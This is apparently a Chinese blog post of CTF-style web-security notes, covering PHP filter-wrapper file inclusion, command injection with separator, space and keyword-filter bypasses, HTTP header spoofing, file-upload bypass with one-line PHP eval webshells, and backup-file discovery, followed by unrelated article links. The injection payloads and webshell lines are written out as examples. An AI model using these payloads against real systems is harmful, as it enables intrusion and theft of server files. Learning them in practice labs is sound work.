web知识点台账

已于 2023-11-08 17:10:05 修改
阅读量79 收藏
点赞数
文章标签: 安全
于 2023-11-06 15:09:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45847059/article/details/134246840
版权

文件包含
include()
利用filter协议,对文本进行特定处理(加密),达到绕过注释的特点。
格式:
resource=<要过滤的数据流> 指定了你要筛选过滤的数据流。
read=<读链的筛选列表> 可以设定一个或多个过滤器名称,以管道符(|)分隔。
write=<写链的筛选列表> 可以设定一个或多个过滤器名称,以管道符(|)分隔。
例子:
?file=php://filter/read=convert.base64-encode/resource=flag.php
参考文章:https://blog.csdn.net/destiny1507/article/details/82347371

命令执行
https://blog.csdn.net/LYJ20010728/article/details/117349106
命令联合执行,用命令拼接符执行漏洞命令
; 前面的执行完执行后面的
| 管道符,上一条命令的输出,作为下一条命令的参数(显示后面的执行结果)
|| 当前面的执行出错时(为假)执行后面的
& 将任务置于后台执行
&& 前面的语句为假则直接出错,后面的也不执行,前面只能为真
%0a (换行)
%0d (回车)
参考文章:https://blog.csdn.net/vanarrow/article/details/108295481
例子: 127.0.0.1 & ls

空格绕过:

${IFS}$9
${IFS}
$IFS$1 //$1改成$加其他数字貌似都行
< 
<> 
%20   (space)
%09   (tab)

flag绕过:
利用变量赋值代替flag字符。
例子:

?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php

反引号会将其内容执行后,将结果替换到命令行中.
base64编码: |base64 -d
例子:

?ip=127.0.0.1;cat$IFS$1`echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d`

http协议标签:(参考文章:https://blog.csdn.net/faramita_of_mine/article/details/123141726)
Host(发送请求时,该报头域是必需的)
请求报头域主要用于指定被请求资源的Internet主机和端口号,它通常从HTTP URL中提取出来的
Referer
当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器我是从哪个页面链接过来的,服务器籍此可以获得一些信息用于处理。
User-Agent(伪造访问工具、 浏览器)
os、浏览器种类、版本信息
X-Forwarded-For(伪造本地ip,X-Forwarded-For:127.0.0.1)
在一些大型网站中,来自用户的HTTP请求会经过反向代理服务器的转发,此时,服务器收到的Remote Address地址就是反向代理服务器的地址。在这样的情况下,用户的真实IP地址将被丢失,因此有了HTTP扩展头部X-Forward-For。(参考:https://blog.csdn.net/yizhenn/article/details/60955599)
Content-Type(文件上传,绕过文件类型白名单)
用于定义网络文件的类型和网页的编码,决定文件接收方将以什么形式、什么编码读取这个文件

eval($_POST[“Syc”]);

**eval是PHP代码执行函数,**把字符串按照 PHP 代码来执行。
$_POST PHP方法将参数Syc作为POST传参方式
可以理解为题目作者已经给我们了连接服务器的密码Syc,我们只需要使用工具连接题目地址就可以啦

upload
upload是有着后缀名检查,文件类型检查,文件解析等多个点排除。
1.上传一个php文件看看过滤点
2.文件类型检查:抓包改变文件类型

Content-Type: image/jpeg

3.后缀检查:改成大小写或加数字,例如php2,Php等,或者phtml或pht,实在不行还可以尝试asp只不过要注意在蚁剑里面修改连接类型。
4.文件内容解析 :
<? 被过滤:

GIF89a? <script language="php">eval($_REQUEST[1])</scrip 作者:很菜的wl https://www.bilibili.com/read/cv18094393/ 出处:bilibili

网站备份文件泄露:
利用dirsearch搜索
常见的网站源码备份文件后缀:

tar.gz,zip,rar,tar

常见的网站源码备份文件名:

web,website,backup,back,www,wwwroot,temp

js弹窗绕过:
一、删除js弹窗代码

二、关闭js弹窗

浏览器搜about:config

搜索javascript,关掉即可
在这里插入图片描述

!baiyian123
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
WEB程序报表C# 源码
03-20
通过这个源码,我们可以学习到如何在ASP.NET环境中使用C#来设计和实现Web报表,包括但不限于以下知识点: 1. 数据库连接和查询:了解如何与SQL Server或其他数据库进行交互,执行查询以获取报表数据。 2. 数据绑定...
云车系统识别2.0.0.zip
06-23
以下将详细解析这些文件及其可能涉及的知识点: 1. **云车车险台账工具.exe.config**:这是一个应用程序配置文件,通常用于存储.NET Framework应用程序的配置信息,如数据库连接字符串、应用设置或自定义行为。在...
物联网工程知识点
热门推荐
飞熊的博客
10-07 1万+
物联网是指将各种实时信息获取设备或设备集合体,如传感网、射频标签阅读装置、条码与二维码设备、仪表、全球定位系统和其它基于物一物通信模式的短距无线自组织网络,通过各种接入网与互联网、广电网或电信网结合起来所形成的一个巨大的实时信息收集、传输、控制及信息服务网络。 物联网应用涉及智能交通、环境保护、政府工作、公共安全、平安家居、智能消防、工业监测、老人护理、个人健康等多个领域。 物联网工程的任务是建立高效、稳定的物联网实时信息系统。 物联网实时信息系统主要包括六个部分:节点、网关、传输网络、数据服务中心、
Web安全-等保测评_db2等保测评命令
2401_84297899的博客
04-28 890
— | — || 系统管理员 | 菜单管理、参数管理、角色设置、组织机构管理、用户的运维管理(只能修改和重置密码,不能新建和删除)、不允许查看审计日志 || 安全管理员 | 用户权限的分配(可以分配业务角色)、可以新建和删除用户、不可修改用户信息;不允许查看审计日志 || 审计管理员 | 只允许查看审计日志,监督系统管理员和安全管理员的操作行为 |系统管理员、安全保密管理员和安全审计员分别承担本单位涉密信息系统的日常运行维护(配置)、安全保密管理(授权)及安全审计(审计)工作。
2024年最全Web安全-等保测评_db2等保测评命令(1)
2401_84302816的博客
05-03 982
2019年5月13日,在网络安全领域,等保2.0相关的《信息安全技术 网络安全等级保护基本要求》、《信息安全技术 网络安全等级保护测评要求》、《信息安全技术 网络安全等级保护安全设计技术要求》等国家标准今日正式发布,。1、结构的变化:将安全管理中心从管理层面提升至技术层面。2、要求项数量的变化。
Web安全-等保测评_db2等保测评命令(2)
2401_84297796的博客
04-28 953
和之前的由DBA管理用户权限不同的是,他们在数据库原有的权限管理之外,对数据的访问控制做更周密和灵活的规则设置。我们想象一下,如果有人可以执行管理数据的操作,有人负责控制管理数据的规则,另外还有人监督和审计前两类人的行为,那么权力过度集中的问题就可以通过互相制约被解决。这些超级用户是数据库创建过程中的缺省用户,可以认为是数据库中的“造物主”,因为所有新的用户都是由他们创建的。但是过度集中的权力都会带来问题,当超级用户拥有最高权力的时候,意味着他或她可以做任何想做的事,而且可以不留下任何痕迹。
柴同学前段时间实习项目知识点总结
weixin_44151134的博客
08-05 422
个人实习知识点笔记
这些网络安全知识,您掌握了么?
2401_84297944的博客
04-30 152
为了帮助大家更好的学习Python,小编给大家准备了一份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂,所有资料共282G,朋友们如果有需要全套网络安全入门+进阶学习资源包,可以********点击免费领取********(如遇扫码问题,可以在评论区留言领取哦)~
【实习】深信服防火墙网络安全生产实习_深信服防火墙练习
2401_84253850的博客
04-28 982
这里将eth2 ip地址配置成172.16.205.1 的原因为,服务器的IP皆位于172.16.205.0/24这个网段,将eth2 ip 配置为172.16.205.1,充当网关。这里eth1 接口ip配置为192.168.1.1 的原因是 PC的ip地址为192.168.1.100,eth1 配置成192.168.1.1 与pc位于同一网段,充当pc的网关。费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!
这些网络安全知识,您掌握了么?(1),使用指南
2301_82242638的博客
04-21 970
为了帮助大家更好的学习Python,小编给大家准备了一份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂,所有资料共282G,朋友们如果有需要全套网络安全入门+进阶学习资源包,可以********点击免费领取********(如遇扫码问题,可以在评论区留言领取哦)~
网络安全防御体系建设-防守实例(1)
2301_76224593的博客
04-29 312
本案例中红队为某集团公司,下辖多个二级企业,网络环境庞大 且复杂,可利用的攻击点众多,主要体现在:集团网络和所有二级企 业、外部业务单位互联互通;各二级企业具有各自的互联网出口,且 出口部署有向外部提供服务的应用系统;各级单位还迁移了大量系统 至集团公有云上,防护点分散且复杂。经过研究,集团决定采取分级防护策略,确认本次演练的防护核 心为集团的目标系统,一级防护系统为集团公有云、关基系统和工控 系统,二级防护为下级企业重点系统和互联网暴露系统,三级防护为 其他一般系统。
基于WEB的设备信息化管理平台设计.pdf
10-21
- **设备状态管理**:记录设备运行状态,如运行/备用记录、故障事件、点巡检结果,通过DCS/PLC采集数据进行状态分析,为检修提供依据。 - **设备检维管理**:制定检维修计划,记录过程和结果,形成检修知识库。 -...
基于SSM的企业台账管理系统源码.zip
10-05
下面将详细探讨这些知识点。 1. **Spring框架**:Spring是Java开发的核心框架,它提供了IoC(Inversion of Control)和AOP(Aspect Oriented Programming)等特性。IoC通过反转控制权,使得对象的创建和管理交由...
javaweb项目ssm-vue企业台账管理平台源码-说明文档
06-20
下面将详细解析这个项目中的关键知识点。 1. **Spring框架**:Spring是Java开发中的核心框架,它提供了依赖注入(Dependency Injection, DI)和面向切面编程(Aspect-Oriented Programming, AOP)等功能,使得代码...
DNSSec:网络安全的守护者
jiamisoft的博客
07-12 412
DNSSec是一种安全协议,它为DNS查询和响应过程提供了额外的加密层。通过使用公钥基础设施(PKI)和数字签名,DNSSec能够验证DNS响应的真实性,从而防止DNS欺骗攻击,即攻击者将用户重定向到恶意网站的行为。
权威认可 | 海云安开发者安全助手系统通过信通院支撑产品功能认证并荣获信通院2024年数据安全体系建设优秀案例
最新发布
haiyunan的博客
07-16 268
在“某省烟草数据安全体系建设规划”项目实践中,海云安基于双生命周期融合与零信任架构的总体思路,立足业务基于场景,通过建设技术、管理、运营三大体系,为公司构建了覆盖数据生命周期、应用生命周期的“数盾”,解决数据安全合规、风险管控、业务影响控制等问题,从而为公司打造一个安全可靠的数据使用环境,助力公司持续稳健发展。通过实施数据安全零信任架构,企业将显著提高数据安全性,减少数据泄露和网络攻击的风险,增强对复杂安全环境的应对能力,实现持续的安全保护和合规运营。
医疗健康信息的安全挑战与隐私保护最佳实践
2301_79955948的博客
07-12 1353
随着医疗信息化的发展,医疗健康数据呈现出爆炸式的增长,医院信息系统、电子病历、健康管理等产生了海量的数据,这些数据的管理和保护成为了巨大的挑战。最新的研究和政策动态显示,国家卫生健康委员会等政府部门正在积极推动医疗健康信息安全管理规范的制定和实施,以加强数据安全和个人健康医疗数据相关的隐私保护。隐私保护的最佳实践包括建立完善的数据安全管理制度、规范医疗健康数据的收集、存储和传输过程,防止数据泄露。这些要求和措施有助于确保医疗健康信息的安全性和个人隐私的保护,减少信息泄露的风险,并促进医疗行业的健康发展。
安全防御-用户认证综合实验
weixin_69863399的博客
07-12 460
生产区访问DMZ需要进行protal认证,设立生产区用户架构,至少包含三个部门,每个部门三个用户,用户统一密码openlab@123,首次登录需要修改密码,用户过期时间设定为10天,用户不允许多人使用。游客区人员不固定,不允许访问DMZ区和生产区,统一使用Guest用户登录,密码Admin@123,游客仅有访问公司门户网站和上网的权利,门户网站地址10.0.3.10。做相关的认证策略,研发部IP地址(10.0.1.20)固定,访问DMZ区使用匿名认证,研发部需要用户绑定IP地址,访问DMZ区使用免认证;
企业保密工作表格台账.pdf
07-13
"《企业保密工作表格台账》是一份全面的企业保密管理工具,旨在确保企业内部信息的安全与合规。这份文档的核心内容围绕着企业保密工作的各个方面展开,包括但不限于: 1. 保密组织架构:强调了保密工作领导责任制,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值